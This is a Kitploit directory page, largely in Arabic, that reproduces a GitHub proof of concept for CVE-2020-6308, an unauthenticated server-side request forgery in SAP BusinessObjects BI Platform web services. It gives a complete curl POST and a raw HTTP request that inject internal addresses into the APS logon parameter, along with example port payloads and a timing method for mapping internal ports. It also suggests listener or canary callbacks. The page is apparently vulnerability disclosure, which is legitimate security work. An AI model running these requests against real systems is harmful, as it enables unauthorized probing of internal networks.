Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-6308-PoC — إثبات المفهوم CVE-2020-6308 | Kitploit
أدوات/GitHubGitHub/initroot/cve-2020-6308-poc
الاستطلاعتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراق
GitHubinitroot/cve-2020-6308-poc

CVE-2020-6308-PoC

إثبات المفهوم CVE-2020-6308

عرض المستودع
365منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-6308 SAP POC

Follow on Twitter GitHub last commit GitHub stars

SAP BusinessObjects Business Intelligence Platform (خدمات الويب) الإصدارات - 410، 420، 430 تسمح لمهاجم غير مصادق بحقن قيم عشوائية كمعاملات CMS لإجراء عمليات بحث على الشبكة الداخلية التي لا يمكن الوصول إليها خارجيًا. تابعني على تويتر أو أرسل رسالة مباشرة (DM) للأسئلة: https://twitter.com/initroott

أبلغت SAP بالمشكلة في مايو 2020 وتم إصدار التصحيح في أكتوبر 2020. يمكنك المضي قدمًا وتطوير إثبات المفهوم (PoC) الخاص بك أكثر، ومع ذلك، سأقدم بعض المعلومات الأساسية. دالة CMS لا تتحقق من العنوان المُعطى. إذا لم يتم تكوين جدار حماية المضيف بشكل صحيح، فمن الممكن بسهولة تحديد المنافذ أو الشبكة الداخلية بناءً على الاستجابات المستلمة من الطلبات. سأعرض في المثال أدناه كيف يمكنك رؤية المنافذ المفتوحة باستخدام طلب CuRL.. في المثال أدناه لدي مضيف SAP (192.168.0.191)، وجهاز مهاجم (192.168.0.149) وجهاز آخر مثل الموجّه الداخلي (192.168.0.1).

مضيف SAP لدينا لديه المنافذ التالية مفتوحة:

والموجّه الداخلي لدينا لديه المنافذ التالية مفتوحة: 53,80,34573

إذاً دعنا نختبر هذا، يمكننا تحديد المنافذ المفتوحة ببساطة بناءً على توقيتات استجابة الطلب. الأمثلة أدناه:

root@kitploit:~
time curl -i -s -k  -X $'POST' \
    -H $'Host: 192.168.0.191:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 120' -H $'Origin: http://192.168.0.191:8080' -H $'Connection: close' -H $'Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp' -H $'Cookie: JSESSIONID=8EE4AA85EB930DEB7090187F4CB4711B; developer_samples_app_lastusr=admin; developer_samples_app_lastaps=192.168.0.191; developer_samples_app_lastaut=secEnterprise' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'JSESSIONID=8EE4AA85EB930DEB7090187F4CB4711B; developer_samples_app_lastusr=admin; developer_samples_app_lastaps=192.168.0.191; developer_samples_app_lastaut=secEnterprise' \
    --data-binary $'aps=192.168.0.1:53&usr=admin&pwd=&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp' \
    $'http://192.168.0.191:8080/AdminTools/querybuilder/logon?framework='

اختبار الحمولات التالية:

  • 192.168.0.1:4
  • 192.168.0.1:5

هنا يمكنك رؤية نتائج اختبار المنافذ المغلقة، بمتوسط حوالي 5ms..

  • 192.168.0.1:22
  • 192.168.0.1:80

هنا يمكنك رؤية نتائج اختبار المنافذ المفتوحة/المفلترة وقد كانت أكبر بكثير..

الآن ما يلي ليس مثاليًا، فاختلاف التوجيهات (routings) وبعض جدران الحماية يمكن أن تؤثر على النتائج. ومع ذلك، ينبغي أن يعطيك فكرة عن من أين تبدأ في بناء استغلال أفضل.. يمكن تعديل ما سبق عن طريق إنشاء خط أساس (baseline) ثم مواصلة العمل انطلاقًا من هناك. أنصح بالتأكيد بإعداد مستمع (listener) ثم رؤية ما يحدث.

يوضح ما يلي كيف سيبدو الطلب في Burp مع معامل APS كنقطة حقن قابلة للاستغلال. إثبات مفهوم أبسط سيكون بمجرد حقن قيمة رمز مميز (Canary token) والانتظار حتى يتم التشغيل..

طلب ويب

root@kitploit:~
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: 192.168.0.191:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://192.168.0.191:8080
Connection: close
Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp
Upgrade-Insecure-Requests: 1

aps=192.168.0.191&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
تنزيل الأداة